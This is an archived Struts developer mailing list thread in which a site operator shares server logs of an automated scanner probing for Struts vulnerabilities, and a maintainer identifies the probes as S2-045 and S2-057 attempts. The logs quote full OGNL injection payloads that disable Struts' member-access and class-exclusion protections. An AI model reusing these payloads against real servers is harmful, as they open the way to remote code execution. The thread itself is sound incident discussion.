struts-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Lukasz Lenart <lukaszlen...@apache.org>
Subject Re: Not seen this attempt before?
Date Tue, 22 Jan 2019 09:13:56 GMT
Yes, that's ok.

wt., 22 sty 2019 o 09:58 Greg Huber <gregh3269@gmail.com> napisał(a):
>
>  Always on the latest.  There was a typo in my reply, sorry :-)
>
> ....OK, thanks, good work!  Did return 500 so looks LIKE NO damage was done.
>
> On Tue, 22 Jan 2019 at 08:34, Lukasz Lenart <lukaszlenart@apache.org> wrote:
>
> > This looks like https://cwiki.apache.org/confluence/display/WW/S2-045
> > What version of Struts do you run?
> >
> > Cheers
> > Lukasz
> >
> > niedz., 20 sty 2019 o 19:11 Greg Huber <gregh3269@gmail.com> napisał(a):
> > >
> > > OK, thanks, good work!  Did return 500 so looks damage was done.
> > >
> > > from the logs
> > > 2019-01-18 18:13:33,218 WARN
> > > org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest
> > > JakartaMultiPartRequest:parse - Unable to parse request
> > > org.apache.commons.fileupload.InvalidFileNameException: Invalid file
> > name:
> > >
> > %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS
> > >
> > ).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class
> > >
> > )).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest
> > > ()).(#res=@org.apache.struts2.ServletActionContext@getResponse
> > >
> > ()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('struts2_security_')).(#res.getWriter().print('check')).(#res.getWriter().flush()).(#res.getWriter().close())}\0b
> > >     at
> > >
> > org.apache.commons.fileupload.util.Streams.checkFileName(Streams.java:187)
> > > ~[commons-fileupload-1.4.jar:1.4]
> > >     at
> > >
> > org.apache.commons.fileupload.disk.DiskFileItem.getName(DiskFileItem.java:253)
> > > ~[commons-fileupload-1.4.jar:1.4]
> > > ....
> > > ....
> > > 2019-01-18 18:13:35,032 WARN
> > > org.apache.struts2.dispatcher.mapper.DefaultActionMapper
> > > DefaultActionMapper:cleanupMethodName -
> > > #_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS
> > > ,#req=@org.apache.struts2.ServletActionContext@getRequest
> > > (),#res=@org.apache.struts2.ServletActionContext@getResponse
> > (),#res.setCharacterEncoding(#parameters.encoding[0]),#w=#res.getWriter(),#w.print(#parameters.web[0]),#w.print(#parameters.path[0]),#w.close(),1?#xx:#request.toString
> > > did not match allowed method names [a-zA-Z_]*[0-9]* - default method
> > > execute will be used!
> > >
> > > Cheers Greg
> > >
> > > On Sun, 20 Jan 2019 at 14:33, Lukasz Lenart <lukaszlenart@apache.org>
> > wrote:
> > >
> > > > niedz., 20 sty 2019 o 13:02 Greg Huber <gregh3269@gmail.com>
> > napisał(a):
> > > > >
> > > > > Any ideas?
> > > > >
> > > > > 14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST
> > > > >
> > > >
> > /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/index.action
> > > > > HTTP/1.1" 500 1497 "-" "Auto Spider 1.0"
> > > > > 14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST /index.action
> > > > HTTP/1.1"
> > > > > 200 2023 "-" "Auto Spider 1.0"
> > > >
> > > > I would say a robot is scanning Internet to find vulnerable sites and
> > > > looks like it addresses the latest vulnerability with namespace
> > > > evaluation
> > > > https://cwiki.apache.org/confluence/display/WW/S2-057
> > > >
> > > >
> > > > Regards
> > > > --
> > > > Łukasz
> > > > + 48 606 323 122 http://www.lenart.org.pl/
> > > >
> > > > ---------------------------------------------------------------------
> > > > To unsubscribe, e-mail: dev-unsubscribe@struts.apache.org
> > > > For additional commands, e-mail: dev-help@struts.apache.org
> > > >
> > > >
> >
> > ---------------------------------------------------------------------
> > To unsubscribe, e-mail: dev-unsubscribe@struts.apache.org
> > For additional commands, e-mail: dev-help@struts.apache.org
> >
> >

---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@struts.apache.org
For additional commands, e-mail: dev-help@struts.apache.org


Mime
View raw message